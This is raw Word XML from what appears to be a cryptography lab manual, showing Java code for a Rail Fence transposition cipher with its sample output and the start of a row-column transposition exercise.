          <w:spacing w:val="-8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depth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272C5CFE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="917" w:right="7261"/>
      </w:pPr>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>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msg.length();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>int c = l / depth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF83E22" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>int k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2D749198" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7" w:line="275" w:lineRule="exact"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mat[][]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char[r][c];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5"/>
        </w:rPr>
        <w:t>enc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0235C7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="275" w:lineRule="exact"/>
        <w:ind w:left="917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"";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD61106" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198" w:right="6526" w:hanging="281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for (int j = 0; j &lt; r; j++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E57E53A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="42"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(k !=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>l)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 w14:paraId="1D01B7F1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="1757"/>
      </w:pPr>
      <w:r>
        <w:t>mat[j][i]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msg.charAt(k++);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FA522B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="14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F2F2F9C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1757"/>
      </w:pPr>
      <w:r>
        <w:t>mat[j][i]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4"/>
        </w:rPr>
        <w:t>'X';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60425467" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="43"/>
        <w:ind w:left="1478"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BACE05D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="245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62282DAB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="206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3A6CE9E4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="238"/>
        <w:ind w:left="1198" w:right="6526" w:hanging="281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for (int j = 0; j &lt; c; j++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F559176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BA6092" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="74"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>enc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2"/>
        </w:rPr>
        <w:t>mat[i][j];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59176886" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40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7211D250" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="207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30BE4E02" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC381D0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917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enc;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A57CF4B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="8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75B85C11" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="239"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB0E0A0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="917" w:right="3057" w:hanging="279"/>
      </w:pPr>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>decode(String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encmsg,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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depth)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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depth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A63C0E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14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encmsg.length();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10"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5ACE6F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="8395"/>
      </w:pPr>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14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depth; int k = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AE6100" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="233" w:lineRule="exact"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mat[][]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char[r][c];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5"/>
        </w:rPr>
        <w:t>dec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CC0D54" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="917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"";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D27F833" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="1198" w:right="6526" w:hanging="281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for (int j = 0; j &lt; c; j++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6169AE91" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="42"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>mat[i][j]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encmsg.charAt(k++);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5ADC0D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="48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6EB89D5C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3B79CCEE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="271"/>
        <w:ind w:left="1198" w:right="6526" w:hanging="281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for (int j = 0; j &lt; r; j++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB79FB3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>dec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2"/>
        </w:rPr>
        <w:t>mat[j][i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01767CAF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="48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3999F335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6214037B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D67913" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>dec;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EF9D41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5D7087CD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="242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41169E5C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="126"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BC615ED" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>railFenceCipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1943EB29" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="91"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA13100" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE1B42E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="917" w:right="783" w:hanging="279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12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>throws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>java.lang.Exception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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railfenceCipherHelper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>= new railfenceCipherHelper();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA00C1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>msg,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>enc,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>dec;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8BE739" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:ind w:left="917" w:right="5720"/>
      </w:pPr>
      <w:r>
        <w:t>msg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"Anna</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>University,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Chennai";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>int depth = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3239F8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917" w:right="5229"/>
      </w:pPr>
      <w:r>
        <w:t>enc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rf.encode(msg,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>depth);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>= rf.decode(enc, depth);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E6A4C7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="hyphen" w:pos="8953"/>
        </w:tabs>
        <w:spacing w:before="41"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>System.out.println("Simulating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Railfence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Cipher\n</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564C3D49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D7EEF0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="71"/>
        <w:ind w:left="917" w:right="2222"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>System.out.println("Input Message : " + msg); System.out.println("Encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15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enc); System.out.printf("Decrypted Message : " + dec);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F649BA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="4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0E772490" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="206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BC26070" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="91"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFA5E09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31F665B3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="34"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Simulating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Railfence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A8431E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1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C47E7A7" wp14:editId="5D8EAFC8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>132834</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2369820" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom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9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9820">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="2369312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3FDF2" id="Graphic 155" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:10.45pt;width:186.6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9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1FgIAAF4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6L44drEuNOMXQoMOA&#10;oivQDDsrshwbkyVNVGLn70fKdpJ1t6I+CKT4RD3yUV7d9a1mR+Whsabg6WzOmTLSlo3ZF/zn9uHT&#10;kjMIwpRCW6MKflLA79YfP6w6l6vM1laXyjNMYiDvXMHrEFyeJCBr1QqYWacMBivrWxHQ9fuk9KLD&#10;7K1Osvn8JumsL523UgHg7mYI8nXMX1VKhh9VBSowXXDkFuLq47qjNVmvRL73wtWNHGmIN7BoRWPw&#10;0nOqjQiCHXzzX6q2kd6CrcJM2jaxVdVIFWvAatL5q2peauFUrAWbA+7cJni/tPLp+OKePVEH92jl&#10;b8COJJ2D/BwhB0ZMX/mWsEic9bGLp3MXVR+YxM1scXO7zLDZEmNp9iU2ORH5dFYeIHxTNuYRx0cI&#10;gwblZIl6smRvJtOjkqShjhoGzlBDzxlquBs0dCLQOSJHJusuRGivtUe1tTEaXjFHapeoNtcoKmWR&#10;ZpxNVSJ2QKBB12CvBiNejfZ1cdoQi3SRfl7G2QCrm/Kh0ZpogN/v7rVnR0GTGT8qBFP8A3MewkZA&#10;PeDgBOSMQG1GqQZ1SKedLU/PnnU40AWHPwfhFWf6u8GJoemfDD8Zu8nwQd/b+EZij/DWbf9LeMeI&#10;QMEDivtkp3kU+aQbVX/G0kljvx6CrRoSNY7RwGh0cIhjieODo1dy7UfU5bew/gsAAP//AwBQSwME&#10;FAAGAAgAAAAhAHx87GfaAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPg0AQhe8m/ofNmHiz&#10;C02pgiyNmph4ldb7lp0CkZ0l7NDSf+940uN78/Lme+Vu8YM64xT7QAbSVQIKqQmup9bAYf/+8AQq&#10;siVnh0Bo4IoRdtXtTWkLFy70ieeaWyUlFAtroGMeC61j06G3cRVGJLmdwuQti5xa7SZ7kXI/6HWS&#10;bLW3PcmHzo741mHzXc/egNtv85Md6yy/UvbxiszzF7Ix93fLyzMoxoX/wvCLL+hQCdMxzOSiGkRv&#10;NrKFDayTHJQEsvRxDeooRpqCrkr9f0H1AwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEB&#10;AAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9&#10;If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAApQ&#10;YDUWAgAAXgQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAh&#10;AHx87GfaAAAACQEAAA8AAAAAAAAAAAAAAAAAcAQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAE&#10;APMAAAB3BQAAAAA=&#10;" path="m,l2369312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623AD7D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C37B37" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="4861"/>
      </w:pPr>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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Anna</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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Chennai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Encrypted Message : An nvriy hnanaUiest,Ceni Decrypted Message : Anna University, Chennai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335AA88D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3800EC36" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167295EE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44EE9BC9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10DB3D12" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C2A737" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5795D45A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="168"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0065B3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6C4A582B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="34"/>
        <w:ind w:left="360" w:firstLine="719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Rail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Fence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Transposition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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output verified successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B256925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3FB6A3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="78"/>
        <w:ind w:left="537" w:right="532"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>27b).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Row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Column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Transformation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Technique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584E7157" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="245"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545F068C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5C8B10EF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="1080" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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decryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-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column transformation technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E158620" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="51"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC769A4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ALGORITHM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2CA79F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="47" w:line="230" w:lineRule="auto"/>
        <w:ind w:right="2408"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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plain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0"/>
